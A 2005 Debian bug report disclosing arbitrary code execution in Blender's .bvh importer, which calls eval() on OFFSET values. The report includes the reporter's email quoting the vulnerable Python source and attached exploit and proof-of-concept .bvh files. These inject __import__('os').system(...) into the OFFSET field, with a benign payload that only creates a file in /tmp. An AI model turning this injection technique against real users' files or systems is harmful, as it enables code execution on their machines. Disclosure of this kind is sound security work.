Bug#330895: blender: Arbitrary code execution when importing a .bvh file

Fri, 30 Sep 2005 03:48:26 -0700 

Subject: blender: Arbitrary code execution when importing a .bvh file
Package: blender
Version: 2.36-1
Severity: grave
Justification: user security hole

The bvh_import.py script supplied with the current Debian Stable and (I
think) unstable versions of Blender is vulnerable to arbitrary code
execution.

The problem was corrected at 2005/01/22 in the CVS but the main package 
doesn't come with the fixed script.

Attached goes the e-mail sended to the Blender people,  one
working exploit to test the vulnerability under Debian, and 2 proof of
concepts.

Regards,
Joxean Koret

-- System Information:
Debian Release: 3.1
Architecture: i386 (i686)
Kernel: Linux 2.6.11-1-386
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15)

Versions of packages blender depends on:
ii  gettext [libg 0.14.4-2                   GNU Internationalization
utilities
ii  libc6         2.3.2.ds1-22               GNU C Library: Shared
libraries an
ii  libfreetype6  2.1.7-2.4                  FreeType 2 font engine,
shared lib
ii  libgcc1       1:3.4.3-13                 GCC support library
ii  libjpeg62     6b-10                      The Independent JPEG
Group's JPEG 
ii  libopenal0    0.2004090900-1.1           OpenAL is a portable
library for 3
ii  libpng12-0    1.2.8rel-1                 PNG library - runtime
ii  libsdl1.2debi 1.2.7+1.2.8cvs20041007-4.1 Simple DirectMedia Layer
ii  libstdc++5    1:3.3.5-13                 The GNU Standard C++
Library v3
ii  libx11-6      4.3.0.dfsg.1-14            X Window System protocol
client li
ii  python2.3     2.3.5-4                    An interactive high-level
object-o
ii  xlibmesa-gl [ 4.3.0.dfsg.1-14            Mesa 3D graphics library
[XFree86]
ii  xlibmesa-glu  4.3.0.dfsg.1-14            Mesa OpenGL utility library
[XFree
ii  xlibs         4.3.0.dfsg.1-14            X Keyboard Extension (XKB)
configu
ii  zlib1g        1:1.2.2-4.sarge.2          compression library -
runtime

-- no debconf information


HIERARCHY
ROOT Joxean
{
  OFFSET __import__('os').system('touch'+chr(32)+'/tmp/bvh_import_exploit')  
0.000000  0.000000 
}
MOTION
Frames: 250
Frame Time: 0.333300 




























































































































































































































































Hi!

        I have been found a security vulnerability in Blender that allows to
execute arbitrary code when trying to import a .bvh file. The problem is the
following:

        The vulnerable module is a python plugin. This plugin parses the .bvh
files and creates the correspondient objects for Blender. The problem is in the
files bvh_import.py and bvh_export.py but it is "presumably" only exploitable 
when importing .bvh files, not when exporting.

        Taking a look to the bvh_import.py file I have been found various 
python 
"eval" calls around the lines 334 and 370. The python "eval" call is EVIL and 
should not be used normally. Anyway, the source code of the plugins looks as
follows:

-------------------------------------------------------------------------------------
321   channelList = []
322   channelIndex = -1
323   
324   lineIdx = 1 # An index for the file.
325   while lineIdx < len(lines) -1:
326     #...
327     if lines[lineIdx][0] == 'ROOT' or lines[lineIdx][0] == 'JOINT':
328       # MAY NEED TO SUPPORT MULTIPLE ROOT's HERE!!!, Still unsure weather 
multiple roots are possible.??
329
330       print len(parent) * '  ' + 'node:',lines[lineIdx][1],' 
parent:',parent[-1]
331       
332       name = lines[lineIdx][1]
333       lineIdx += 2 # Incriment to the next line (Offset)
334       offset = ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), 
eval(lines[lineIdx][3]) )
335       lineIdx += 1 # Incriment to the next line (Channels)
-------------------------------------------------------------------------------------

        As we can see the second (lines[lineIdx][1]), third (lines[lineIdx][2]) 
and
fourth word of the parsed line will be evaled to get the X, Y and Z values of 
the 
object but, what about if this is not a number? If it's malicious python code? 
One
sample:

-------------------------------------------------------------------------------------
01 HIERARCHY
02 ROOT name 1 2
03 
04 1 2 3 4
05 1 __import__('os').system('touch'+chr(32)+'/tmp/bvh_import_exploit') 3 4
06 
07 
08 
09 
10
-------------------------------------------------------------------------------------

        The second word of the 5th line is a correct fragment of python code. 
When the
plugin tries to parse the .bvh file the code __import__('os')..., will be 
evaled and 
the file /tmp/bvh_import_exploit will be created. But, I don't known why, this 
proof
of concept doesn't work on my machine so I created a valid exploit that Blender 
imports
without any error and/or warnings and creates the file /tmp/bvh_import_exploit. 
Attached
goes a valid exploit called exploit.bvh that creates the file 
/tmp/bvh_import_exploit.

NOTE: This vulnerability is exploitable in any of the Blender supported 
plattforms.

Regards,
Joxean Koret
HIERARCHY
End Site

1 __import__('os').system('touch'+chr(32)+'/tmp/bvh_import_exploit') 3 4
HIERARCHY
ROOT name 1 2

1 2 3 4
1 __import__('os').system('touch'+chr(32)+'/tmp/bvh_import_exploit') 3 4

Attachment: signature.asc
Description: Esta parte del mensaje está firmada digitalmente

Reply via email to